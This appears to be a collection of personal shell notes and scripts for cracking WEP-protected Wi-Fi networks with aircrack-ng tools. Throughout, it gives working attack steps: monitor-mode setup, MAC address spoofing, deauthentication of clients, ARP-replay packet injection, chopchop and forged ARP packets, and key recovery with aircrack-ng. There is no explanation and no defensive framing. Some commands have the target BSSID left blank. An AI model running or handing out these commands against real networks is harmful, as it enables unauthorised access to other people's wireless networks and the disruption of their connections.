airmon-ng start wlan0 6
wesside-ng -i wlan0
#!/bin/sh
export BSSID=00:1A:4F:9A:6F:9D
export CHANNEL=11
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
iwconfig eth1 mode managed channel $CHANNEL key s:password ap $BSSID
#ifconfig eth1 hw ether 00:a1:b2:c3:d4:e5
ifconfig eth1 up
ifconfig rtap0 up
#########
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
iwconfig eth1 ap $BSSID
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
ifconfig eth1 hw ether 00:19:3E:00:3E:36
iwconfig eth1 channel $CHANNEL
ifconfig eth1 up
ifconfig rtap0 up
#########
xterm -e "airodump-ng --channel $CHANNEL --bssid $BSSID -w dumpfile rtap0" &
sleep 10
xterm -e "aireplay-ng --arpreplay -b $BSSID -h 00:0E:35:A3:23:F7 -i rtap0 eth1" &
sleep 210
xterm -e "aircrack-ng -0 -b $BSSID dumpfile*.cap; sleep 1d" &
exit 0
http://www.offensive-security.com/movies/bt3teaser/bt3teaser.html
http://backtrack.offensive-security.com/index.php?title=HCL:Wireless
http://www.aircrack-ng.org/doku.php?id=wesside-ng
http://aircrack-ng.org/doku.php?id=injection_test
# intel 4965
airmon-ng stop mon0
airmon-ng stop wlan0
killall NetworkManager
killall wpa_supplicant
killall dhclient3
airmon-ng start wlan0
# get open
xterm -e sudo airodump-ng -t opn mon0 &
# get wep
xterm -e airodump-ng -w wep.out -t wep mon0 &
# search key
xterm -e aircrack-ng wep*.cap &
# Links
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
# Hardware
TL-WN422G
TL-WN321G
AWUS036H
$ airmon-ng stop rausb0
$ ifconfig rausb0 down
$ macchanger --mac 00:11:22:33:44:55 rausb0
$ airmon-ng start rausb0
$ airodump-ng rausb0
find the bssid
copy the bssid
$ airodump-ng -c 1 -w output --bssid  rausb0
$ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
$ aireplay-ng -0 5 -a  rausb0
$ aireplay-ng -4 -b  -h 00:11:22:33:44:55 rausb0
answer yes and wait
$ packetforge-ng --arp -a  -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
$ aireplay-ng -2 -r arprequest rausb0
say yes
$ aircrack-ng output-01.cap
###################
wep.sh
#!/bin/bash
airmon-ng stop mon0
airmon-ng stop wlan0
#killall NetworkManager
#killall wpa_supplicant
#killall dhclient3
airmon-ng start wlan0
xterm -e airodump-ng -w wep.out -t wep mon0 &
xterm -e aircrack-ng wep*.cap &
http://ubuntuforums.org/showthread.php?t=1178790
http://aircrack-ng.org/doku.php?id=rt73